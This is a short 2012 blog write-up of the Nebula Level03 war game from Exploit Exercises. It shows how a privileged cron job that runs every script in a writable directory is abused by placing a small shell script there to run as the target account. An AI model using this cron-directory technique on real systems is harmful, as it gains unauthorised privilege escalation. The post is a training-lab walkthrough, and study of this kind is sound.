01 December 2012

Exploit.Exercise.com - Nebula - Level03

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

I was surprised how easy this level was. According to Exploit Exercises, Nebula Level03:
"Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes."

Checking out writable.sh, we see
$ cat ../writable.sh
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done

This script executes everything within the directory writable.d, then deletes it.

Let's create a script for cron to execute for us inside the writeable.d directory.
$ echo -e '#!/bin/bash\n/bin/getflag > /tmp/output.txt' > file.sh 
$ chmod 700 file.sh

The output of the getflag command usually produces
$ getflag is executing on a non-flag account, this doesn't count

However, once cron executes our script, it creates a file output.txt with the output from the getflag command.

$ cat /tmp/output.txt 
You have successfully executed getflag on a target account

There we go!